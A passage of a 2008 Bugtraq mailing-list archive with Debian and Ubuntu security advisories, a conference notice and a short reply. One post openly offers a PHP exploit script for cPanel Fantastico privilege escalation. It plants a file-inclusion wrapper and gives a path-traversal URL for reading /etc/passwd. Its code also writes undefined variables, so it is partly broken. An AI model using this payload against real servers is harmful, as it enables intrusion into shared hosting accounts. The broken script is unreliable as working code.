    http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbisenc2_1.2.0.dfsg-2ubuntu0.1_powerpc.deb
      Size/MD5:    83532 be00dcbd1f6a209ff7e59669ea3bcf33
    http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbisfile3_1.2.0.dfsg-2ubuntu0.1_powerpc.deb
      Size/MD5:    23644 d07be5c602f3714cf0701226fef5bfa4

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbis-dev_1.2.0.dfsg-2ubuntu0.1_sparc.deb
      Size/MD5:   461822 9396b9f159e3e96ce44c140f02dcf3cb
    http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbis0a_1.2.0.dfsg-2ubuntu0.1_sparc.deb
      Size/MD5:    99428 8dbbaf70afa928a5d2407d1eef3b1922
    http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbisenc2_1.2.0.dfsg-2ubuntu0.1_sparc.deb
      Size/MD5:    80484 e5592f1cd6297a630fd7358d6c88c82e
    http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbisfile3_1.2.0.dfsg-2ubuntu0.1_sparc.deb
      Size/MD5:    19054 66c63c0e4024661e9d905b22862450c5



--=-7oAJ0ExbFsnSiyDVIc2/
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkk0Gt0ACgkQLMAs/0C4zNr38QCfXFL62MDw9jwrgIaghp4X5EIY
QkYAoL0rSF+kmaXi8jEaPbWsP6uyoIxe
=Ge08
-----END PGP SIGNATURE-----

--=-7oAJ0ExbFsnSiyDVIc2/--

From - Mon Dec  1 20:05:17 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004bdf
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38789-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id DA34BEC10C
for <lists@securityspace.com>; Mon,  1 Dec 2008 19:56:47 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 44E6F1437A3; Mon,  1 Dec 2008 15:55:25 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 7972 invoked from network); 1 Dec 2008 22:43:14 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <dannf@ldl.fc.hp.com>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight: using cached result; rate: -7
X-Greylist: delayed 386 seconds by postgrey-1.27 at liszt; Mon, 01 Dec 2008 22:58:43 UTC
X-Virus-Scanned: Debian amavisd-new at ldl.fc.hp.com
Date: Mon, 1 Dec 2008 15:49:35 -0700
From: dann frazier <dannf@debian.org>
Message-ID: <20081201224935.GE22463@ldl.fc.hp.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-10.7 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, IMPRONONCABLE_2=1, LDO_WHITELIST=-5,
MURPHY_WRONG_WORD1=0.1, MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1676-1] New flamethrower packages fix denial of service
Priority: urgent
Resent-Message-ID: <qymJXf9Bj_G.A.2YD.qwGNJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Mon,  1 Dec 2008 22:58:50 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1676-1                security@debian.org
http://www.debian.org/security/                           dann frazier
December 01, 2008                   http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : flamethrower (0.1.8-1+etch1)
Vulnerability  : insecure temp file generation
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2008-5141
Debian Bug     : 506350

Dmitry E. Oboukhov discovered that flamethrower creates predictable temporary
filenames, which may lead to a local denial of service through a symlink
attack.

For the stable distribution (etch), this problem has been fixed in version
0.1.8-1+etch1.

For the unstable distribution (sid), this problem has been fixed in
version 0.1.8-2.

We recommend that you upgrade your flamethrower package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/f/flamethrower/flamethrower_0.1.8-1+etch1.diff.gz
    Size/MD5 checksum:     3138 f6263743cb41f4f75ab9f4dbc76a71a5
  http://security.debian.org/pool/updates/main/f/flamethrower/flamethrower_0.1.8.orig.tar.gz
    Size/MD5 checksum:    23485 04e1b6c5b4e72879e8aa69fcccb0491f
  http://security.debian.org/pool/updates/main/f/flamethrower/flamethrower_0.1.8-1+etch1.dsc
    Size/MD5 checksum:      598 4a880e477706f57bcfb806eb46a81922

Architecture independent packages:

  http://security.debian.org/pool/updates/main/f/flamethrower/flamethrower_0.1.8-1+etch1_all.deb
    Size/MD5 checksum:    16880 fbc0c1b237503a9d88521b444e4319e0


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJNGi7huANDBmkLRkRAtmHAJ46ID1fo23mpT0LaR+58dF75sgdaACgk1R2
I73MleBHGf32hPSwMhRRQbY=qNZs
-----END PGP SIGNATURE-----

From - Tue Dec  2 10:56:18 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004bf3
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38791-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 59100EC112
for <lists@securityspace.com>; Tue,  2 Dec 2008 10:47:25 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id A29B71437D7; Tue,  2 Dec 2008 07:44:08 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 21281 invoked from network); 2 Dec 2008 12:00:51 -0000
Message-ID: <4935272C.5010609@syscan.org>
Date: Tue, 02 Dec 2008 20:16:44 +0800
From: "organiser@syscan.org" <organiser@syscan.org>
User-Agent: Thunderbird 2.0.0.18 (Windows/20081105)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, Ring-of-Fire@yahoogroups.com,
framework@spool.metasploit.com, pen-test@securityfocus.com,
full-disclosure@lists.grok.org.uk, security-basics@securityfocus.com,
security-management@securityfocus.com, websecurity@webappsec.org,
webappsec@securityfocus.org, vuln-dev@securityfocus.com,
focus-apple@securityfocus.com
Subject: Dates for SyScan'09
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Status:   

dear all

There will be 4 SyScan'09 conferences next year in 4 different exciting 
countries in Asia. They are as follows:

SyScan'09 Shanghai: 14th and 15th May 2009
SyScan'09 Hong Kong: 19th and 20th May 2009
SyScan'09 Singapore: 2nd and 3rd July July 2009
SyScan'09 Taiwan: 7th and 8th July 2009

Do keep a lookout for more information at www.syscan.org. We will be 
announcing the CFP very soon.

-- 
Thank you
Thomas Lim
Organiser
SyScan'08
www.syscan.org

From - Tue Dec  2 11:06:48 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004bf5
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38790-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id B094AEC112
for <lists@securityspace.com>; Tue,  2 Dec 2008 10:58:51 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 7879C14372A; Tue,  2 Dec 2008 07:43:59 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11452 invoked from network); 2 Dec 2008 01:02:50 -0000
Date: Mon, 1 Dec 2008 18:07:03 -0700
Message-Id: <200812020107.mB2173Pv007213@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: l1un@hotmail.com
To: bugtraq@securityfocus.com
Subject: Cpanel fantastico Privilege Escalation "ModSec and PHP
 restriction Bypass"
Status:   

Script : Cpanel 11.x
bug : language.php [edite file]
exploit=Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"

 safemode off , mod_security off  Disable functions :  All NONE ,access root folder 

<?php
/*
######################################## 
# Deadly Script  by Super-Crystal 
# bypass Cpanel fantastico 
# www.arab4services.net
#        ##e-mail : l1un@hotmail.com , i-1@hotmail.com##
#######################################
*/
set_time_limit(0);
if(isset($_POST['sup3r'])) {
if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) {
$phpwrapper = '<?php
include_once("./language/".$_GET[sup3r].".php"); 
?>
';
fwrite($h,$prctl);
fclose($h);
$handle = fopen($_POST['php'], "w");
fwrite($handle, $phpwrapper);
fclose($handle);
echo "Building exploit...<br />";
echo "coding by Super-Crystal <br />";
echo "Cleaning up<br />";
echo "Done!<br />
</pre>";
} else {
echo "error : ".php_uname();
}
} else {
?>
<div align="center">
<h3>Deadly Script</h3>
<font color=red>Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</font><br />
<pre><div align="center">
</pre></div><br />
<table border="0" cellspacing="0">
<tr>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
<table border="0" cellspacing="0">
<tr>
<td><div align="right">Exploit:</div></td>
<td>
<select name="exploit">
<option selected="selected">Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</option>
</select>
</td>
</tr>
<tr>
<td><div align="right">change</div></td>
<td><input type="text" name="php" size="50" value="<?php echo getcwd()."/language.php" ?>" /></td>
</tr>
<tr>
</table>
</div>
<input type="hidden" name="sup3r" value="doit" />
<input name="submit" type="submit" value="Submit" /><br />
1- change /home/[user]/.fantasticodata/language.php
<br />
2- click on the submit
<br />
3- now put it like this (e.g) 
http://www.xxxx.com:2082/frontend/x3/fantastico/index.php?sup3r=../../../../../../etc/passwd%00 .
<br />
<font color=red>Written: 10.10.2008</font><br />
<font color=blue>Public: 26.11.2008</font><br />
<div align="center">
<font color=red>Author : Super-Crystal</font><br />
<a href="http://www.arab4services.net">Arab4services.net </a></center>
</div>
</form>
<?php } ?> 


arab4services.net

From - Tue Dec  2 11:46:51 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004bf9
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38792-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 16F11EC112
for <lists@securityspace.com>; Tue,  2 Dec 2008 11:38:30 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 7791314392F; Tue,  2 Dec 2008 07:45:06 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 30522 invoked from network); 1 Dec 2008 17:25:09 -0000
Date: 1 Dec 2008 17:35:20 -0000
Message-ID: <20081201173520.6014.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: 0xjbrown41@gmail.com
To: bugtraq@securityfocus.com
Subject: Re: /bin/login gives root to group utmp
Status:   

I'm glad you finally seemed to make the 'bug' fixing team of Debian aware of security issues. I'm just glad I personally haven't seem this much scrutiny from the security team or my faith in Debian maintainers in all areas would significantly drop even more. Nice find.

From - Tue Dec  2 14:06:47 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004c05
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38793-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 60618EC113
for <lists@securityspace.com>; Tue,  2 Dec 2008 14:01:44 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id C65ED14381C; Tue,  2 Dec 2008 09:16:13 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 27530 invoked from network); 2 Dec 2008 16:08:13 -0000
Subject: [USN-683-1] Imlib2 vulnerability
From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>,
full-disclosure@lists.grok.org.uk
X-Original-To: marc.deslauriers@cleanmail.canonical.com
X-Mailcontrol-Inbound: 
 uq3drnD2P+ps5SfEb0fvr78+NoP1DHBZwGqKpaXB2eTgNv8D6KLIxb8+NoP1DHBZ8VSaBg0k0xwX-Spam-Score: -12.4
X-Scanned-By: MailControl A_08_51_00 (www.mailcontrol.com) on 10.74.0.159
Content-Type: multipart/signed; micalg="pgp-sha1"; protocol="application/pgp-signature"; boundary="=-hEcjMUhJXPxbeMfFKsG9"
Date: Tue, 02 Dec 2008 11:24:02 -0500
Message-Id: <1228235042.8552.1.camel@mdlinux.technorage.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.24.1 
Status:   


--=-hEcjMUhJXPxbeMfFKsG9
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

===========================================================
Ubuntu Security Notice USN-683-1          December 02, 2008
imlib2 vulnerability
CVE-2008-5187
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libimlib2                       1.2.1-2ubuntu0.3

Ubuntu 7.10:
  libimlib2                       1.3.0.0debian1-4ubuntu0.1

Ubuntu 8.04 LTS:
  libimlib2                       1.4.0-1ubuntu1.1

Ubuntu 8.10:
  libimlib2                       1.4.0-1.1ubuntu1.1

After a standard system upgrade you need to restart any applications that
use Imlib2 to effect the necessary changes.

Details follow:

It was discovered that Imlib2 did not correctly handle certain malformed
XPM images. If a user were tricked into opening a specially crafted image
with an application that uses Imlib2, an attacker could cause a denial of
service and possibly execute arbitrary code with the user's privileges.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.2.1-2ubuntu0.3.diff.gz
      Size/MD5:   111655 1db5e38ae075ba7879e2379de336fa60
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.2.1-2ubuntu0.3.dsc
      Size/MD5:      753 d207af283f3356525dd8bf1863b18dde
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.2.1.orig.tar.gz
      Size/MD5:   911360 deb3c9713339fe9ca964e100cce42cd1

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.3_amd64.deb
      Size/MD5:   352032 ca8a615db5f3fe5f9d9e7be5bc6e5251
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.3_amd64.deb
      Size/MD5:   214630 575972ea6305a67fb7dba4a9767bd738

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.3_i386.deb
      Size/MD5:   302506 558d3ca8288047f906d0abe64cacff0a
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.3_i386.deb
      Size/MD5:   193346 8814a94983cb3dc69c8751f8ffb0c0a7

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.3_powerpc.deb
      Size/MD5:   341950 42cd29c55636cf54b595d40a1d8da334
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.3_powerpc.deb
      Size/MD5:   212852 aebcc16c8a0f26d97ff9b8853bc96344

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.3_sparc.deb
      Size/MD5:   318490 f96156937b2ac3fddfef13feab5c317b
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.3_sparc.deb
      Size/MD5:   194030 74b17b7473671d6bce17168e3a93892e

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.3.0.0debian1-4ubuntu0.1.diff.gz
      Size/MD5:    13311 8aace634a15651f892a707288bb06d80
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.3.0.0debian1-4ubuntu0.1.dsc
      Size/MD5:      873 b0131ffc8e50111ef870a805d74b5603
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.3.0.0debian1.orig.tar.gz
      Size/MD5:   617750 7f389463afdb09310fa61e5036714bb3

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.1_amd64.deb
      Size/MD5:   365864 03137784605c2957899f2e3ea98c7abb
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.1_amd64.deb
      Size/MD5:   213966 04d1d6d16c95ef15d400b69f946ef465

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.1_i386.deb
      Size/MD5:   334386 8964c1cf0d89fce685e45c275fe9b398
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.1_i386.deb
      Size/MD5:   205672 7eda0e69c39446878a3604fcfa2bd100

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.1_lpia.deb
      Size/MD5:   341396 c566cf2c1190d50307518180ecbaf1f8
    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.1_lpia.deb
      Size/MD5:   209212 cbdccce66f76e6811562e07c69b00001

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.1_powerpc.deb
      Size/MD5:   362434 7174f6ee1792aa3e93f90ec6cf6bd05b
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.1_powerpc.deb
      Size/MD5:   229776 a5bfce5092d800574750491de6f24f71

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.1_sparc.deb
      Size/MD5:   338858 a727f8fe8ee40579070f519ffe850ea6
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.1_sparc.deb
      Size/MD5:   200882 6cb8819fdc9d1782627c516510aec328

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.4.0-1ubuntu1.1.diff.gz
      Size/MD5:    56206 26e4031ba0fcdb20ab253d387503c4f3
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.4.0-1ubuntu1.1.dsc
      Size/MD5:      843 8801c85496cc40b02fd9c8c8e7a5ecf4
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.4.0.orig.tar.gz
      Size/MD5:   845017 1f7f497798e06085767d645b0673562a

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.4.0-1ubuntu1.1_amd64.deb
      Size/MD5:   344406 c04c37389fb2d858d0b564ec88ffaf28
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.4.0-1ubuntu1.1_amd64.deb
      Size/MD5:   199718 5c231fd28f7c89db183623a76136058b

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.4.0-1ubuntu1.1_i386.deb
      Size/MD5:   309666 4268bead6afda98818eddf883709ce2b
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.4.0-1ubuntu1.1_i386.deb
      Size/MD5:   190212 3e60cdf97e47607e3fc821af96c1fbb1

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.4.0-1ubuntu1.1_lpia.deb
      Size/MD5:   318240 5846ac281ac72f03a22a391e21476c37
    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.4.0-1ubuntu1.1_lpia.deb
      Size/MD5:   194098 413867c3a222937d5d90ee0ff4e9af61

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.4.0-1ubuntu1.1_powerpc.deb
      Size/MD5:   336314 e0028411b4af81155c1982ff337d42ee
    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.4.0-1ubuntu1.1_powerpc.deb
      Size/MD5:   211612 2df6e5a5df87ca1d3a95d7918ff01a65

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.4.0-1ubuntu1.1_sparc.deb
      Size/MD5:   314234 67fccb39c18bcb39a773b0eb5e2fe9e1
    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.4.0-1ubuntu1.1_sparc.deb
      Size/MD5:   181098 3bf535ce2f3d9385e61b271426e45c37

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.4.0-1.1ubuntu1.1.diff.gz
      Size/MD5:    56403 70e219ec859f25bdf7ac45f07faa2afe
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.4.0-1.1ubuntu1.1.dsc
      Size/MD5:     1246 4e61ec19bae78ef99c632a398a4dd081
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.4.0.orig.tar.gz
      Size/MD5:   845017 1f7f497798e06085767d645b0673562a

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.4.0-1.1ubuntu1.1_amd64.deb
      Size/MD5:   357022 ea21a9132b0654c39c05866edec72dd8
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.4.0-1.1ubuntu1.1_amd64.deb
      Size/MD5:   206042 a8648520afe8a53116613df55736712b

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.4.0-1.1ubuntu1.1_i386.deb
      Size/MD5:   319786 487eced921c7baa6be606961f6020dd0
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.4.0-1.1ubuntu1.1_i386.deb
      Size/MD5:   196246 4015b74d4e91e1720bdcc6d537de3bc2

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.4.0-1.1ubuntu1.1_lpia.deb
      Size/MD5:   324676 827319f43ba42952929ee373b4659d91
    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.4.0-1.1ubuntu1.1_lpia.deb
      Size/MD5:   197582 ac1494911ce7181bf413933b0d10c1b0

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.4.0-1.1ubuntu1.1_powerpc.deb
      Size/MD5:   348320 5c8fac9d47df022aabaed60ec895caee
    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.4.0-1.1ubuntu1.1_powerpc.deb
      Size/MD5:   219940 5d8a707d8a1278d90c1d39e5da9fa3f1

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.4.0-1.1ubuntu1.1_sparc.deb
      Size/MD5:   321206 89fb42e14d2e5f4edb2edfd290e544f2
    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.4.0-1.1ubuntu1.1_sparc.deb
      Size/MD5:   185468 96423e069f49158142bf1b5d8627e5b4



--=-hEcjMUhJXPxbeMfFKsG9
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkk1YR8ACgkQLMAs/0C4zNpdHwCgvjEPDhTaU3CYq1oUdFFQJzlz
Q8IAn2RipAPZ8p2KJZFxYGyC90asRZpf
=WlM8
-----END PGP SIGNATURE-----

--=-hEcjMUhJXPxbeMfFKsG9--

From - Tue Dec  2 16:56:52 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004c0a
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38801-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
